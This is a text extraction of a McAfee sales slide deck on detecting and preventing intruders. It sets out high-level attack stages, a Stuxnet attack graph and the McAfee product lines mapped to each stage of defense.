7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
1/19
Detecting and Preventing Intruders
Mark Mastrangeli
Sr. Sales Engineer
Government, Healthcare and
Education
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
2/19
McAfee ConfidentialInternal Use Only
Agenda Detecting and Preventing Intruders
Threat Landscape
Attack Graphing
Protection GraphingAnti-Virus?
HTML 5 Malware with Evasion
Advanced Malware Detection
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
3/19
Malware Continues to Grow
0
2,000,000
4,000,000
6,000,000
8,000,000
10,000,000
12,000,000
Q12010
Q22010
Q32010
Q42010
Q12011
Q22011
Q32011
Q42011
Q12012
Q22012
Q32012
Q42012
Q12013
14,000,000
Source: McAfee Labs ,2013
New Malware Samples New malware
samples grew
22% from
Q412 to Q113
2012 new
malware sample
discoveries
increased 50%
over 2011.
Malware continues to grow, and getting more
sophisticated
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
4/19
McAfee ConfidentialInternal Use Only
Attack Graph Overview
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
5/19
McAfee ConfidentialInternal Use Only
User visits trusted web site
Server compromised
(e.g. PHP vuln)
XSS vulnerability
User visits untrusted web site
Blackhat SEO
Malicious ad
URL in forum posting
Clickjacking
User visits
page with
malicious
content
Convince user to run executable
Video Codec
Game Crack
etc...
File format vulnerabilityMS Office
Adobe Acrobat
etc...
Browser vulnerability
ActiveX or BHO/plugin exploits
Browser exploit
ActiveX unsafe for scripting
(e.g. ADODB)
Malicious
code
execution
Attack Graph Basics
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
6/19
McAfee ConfidentialInternal Use Only
Malicious ActivityEstablish PresenceLocal ExecutionFirst Contact
Send
unsolicited
message
IM
PhysicalAccess
to HW
E.g. Stolen
laptop
InsertPhysical
Media
E.g.: USBdrive
User visitsuntrustedweb site
User visitstrustedweb site
Man in themiddle
Wired
Wireless (e.g.Rogue AP)
RemoteExploit
NetworkServiceExploit
ApplicationExploit (e.g.webserver)
User visitspage withmalicious
content
User opens
malicious
message
User visits(apparently)
page controlled
by attacker
Modifyserver
filesystem/
database
Convinceuser to run
executable
File format/
browservulnerability
Phishing
attack
Maliciouscode
execution
Download
and installadditional
malware
Propagateanothersystem
NetworkServiceExploit
etc...
Copy to fileshare
Persist on thesystem
Modifyexistingservice
Add BHO orexplorer
extension
Etc...
Install service
Self-preservation
Disruptsecurity
software orupdates
Rootkittechniques
ProcessInjection
Etc...
Tampering
Malicious
destruction
of files
Ransomware
encrypt/
modify files
Money extorted
to recover files
Destruction or
modification ofusers files
BotservicesRemoteaccess
DDOS
Send spam
Open proxy
Command control
IRC, HTTP, P2P,
twitter etc.
Capture sensitivedata
Keyloggers
Man-in-thebrowser
etc.
Adware/scareware
Browser plugins,toolbars, config
changes
etc.
Transmit
captured
data
Adsdisplayed,click fraud
User pays forFake AV
Bothinstalled &operational
Sell botservices
IntellectualProperty
Theft
IdentityTheft/
FinancialFraud
Malwareremains
active in
system
Accesstargets LAN
Public WAP
Four Stages of Attack
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
7/19
McAfee ConfidentialInternal Use Only
Example: Stuxnet
Physical Access to HW
E.g.: Stolen laptop
Insert Physical Media
Send Unsolicited message
User visits untrusted site
Access targets LAN
E.g.: USB drive
IM
E.G.: Blackhat SEO
User visits trusted web site
E.G.: XSS vuln
Public WAP
Compromise another
system
User visits
page with
malicious
content
Road local file
E.g. cookie,
password
cache
Malicious codeexecution
Identity Theft/
Financial
Fraud
Modify server
filesystem/
database
Evil Maid attack
Execute fromremovable media
Message readervulnerability
Convince user to runexecutable
Autorun
OS Exploit
File format/browservulnerability
MITMRemote Exploit
Network Service
Exploit
Application exploit
(.eg. webserver)
LNK exploit (0 day)
CVE-2010-2568
Windows Server Service
RPC exploit CVE-2008-4250Print Spooler
Exploit (0-day)
Use default password
on WinCC MS SQL
database
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
8/19
McAfee ConfidentialInternal Use Only
Privilegeescalation
Propagate to the system
Transmitcaptured data
Download & Install
additional malware
Persist on the system
Self-preservation
Modify industrial
control system
Bot services
Command control
Adware/scareware
Capture sensitive data
Example: Stuxnet
Ads displayed,click fraud
User pays forFake AV
Malicious
codeexecution
Malware remainsactive on system
Both
installed &
operational
Sell bot
services
IntellectualProperty
Theft
Identity Theft/
Financial Fraud
Industrial,espionage,
sabotage
Hide
Install service
Add BHO or explorerextension
Registry chance
(e.g. Applnit_DLLs)
Etc...
Disrupt security
software or updates
Disable admin apps(task manager, safe
mode etc.
User-mode hook
Kernel hook-
SSDT, IDT, IRP etc.
Use signed driver
or binary
Process Injection
Inject code into PLCprogramming tool
Remote access
DDOS
Send spam
Open proxy
IRC, HTTP, P2P,twitter etc.
Emulate securitysoftware UI
Browser configchanges
Keyloggers
Man-in-the browserHook comm APIs
(user mode)
Read cachedpasswords from disk
Change host file
Hides malicious
LNK files
Drivers signed
by Realtek and
JMicron
Simple HTTP protocol.
Comm. code injected
into IE
Updates and other code
can be runUses RPC to propagate
updates to other
systems on the LAN
Injects code into Step7
Alters code blocks
written out to PLC and
hides changes from user
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
9/19
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
10/19
McAfee ConfidentialInternal Use Only
Protection Graph
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
11/19
McAfee ConfidentialInternal Use Only
Four Stages of Attack
First Contact
Physical Access
Unsolicited
Message
Website
Network Access
Local Execution
Exploit
Social
Engineering
Configuration
Error
Establish Presence
Download Malware
Escalate Privilege
Persist on System
Self-Preservation
Malicious Activity
Propagation
Bot Activities
Adware & Scareware
Identity &
Financial Fraud
Tampering
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
12/19
4 Phase Protection Methods
FirstContact
LocalExecution
EstablishPresence
MaliciousActivity
McAfeeSiteAdvisor
McAfee Enterprise
Mobility Management
McAfee Device Control
McAfee Desktop Firewall
Advanced Ant-Malware &Detection
Website Filtering
Mobile Device Management
Physical File Transfer
McAfee Desktop Firewall
WebFiltering
EmailFiltering
McAfee VirusScanEnterprise
On-Access Scanning File Scanning Write Blocking
McAfee Database Activity Monitor
Database Vulnerability Blocking
McAfee Deep Defender
Rootkit Prevention
McAfee Host Intrusion Prevention
Buffer Overflow Prevention Behavioral Prevention
McAfee Application Control for Servers or Desktops
Install and Execution Prevention Change Protection
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
13/19
McAfee ConfidentialInternal Use Only
Cost of an AV-Only Strategy:
Customer Survey
AV-Only users spent 1.5-times more than leaders
Less efficient leaders deployed security at higher scale and lower cost
Less effective AV-only group bore higher costs due to outbreaks
AV-Only users accepted 68% of IT Security-related risk,
Compared to just 58% by the leading performers
Source: Aberdeen Research 3-2012
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
14/19
McAfee ConfidentialInternal Use Only
Exploit Toolkit Coverage
Todays malware threats, like Blackhole and Phoenix, require full
Web Browser emulation.
ECMAScript and W3C (HTML) DOM needs to be simulated correctly,
Browser-specific differences also need to be simulated
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
15/19
McAfee ConfidentialInternal Use Only
What is Sandboxing?
Sandboxing Run suspect file in safe (virtual)
environment
Analyze actual behavior of any
unknown file
Report on intent of any file
malicious or not
? ? ?
SANDBOXING
SAFE MALWARE MALWARE
UNKNOWN
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
16/19
McAfee ConfidentialInternal Use Only
Advanced Threat Defense
Dynamic Analysis Observe Registry Modifications
Observe network communications
Observe process activities
Observe file system changes
Static Code Analysis Unpacking
Static Analysis of disassembled code
Discover of latent code
Hidden logic paths
Graphing
? ? ?
SANDBOXING
SAFE MALWARE MALWARE
UNKNOWN
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
17/19
McAfee ConfidentialInternal Use Only
Multiple Anti-Malware Methods
Anti Virus signatures
Anti Virus inspection
Global file reputation
Emulation engine
Anti- Malware
Advanced SandboxingStatic and dynamic code
analysis
Real-timeDown-select process
Duration
ofAnalysis
Depth of Analysis
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
18/19
7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
19/19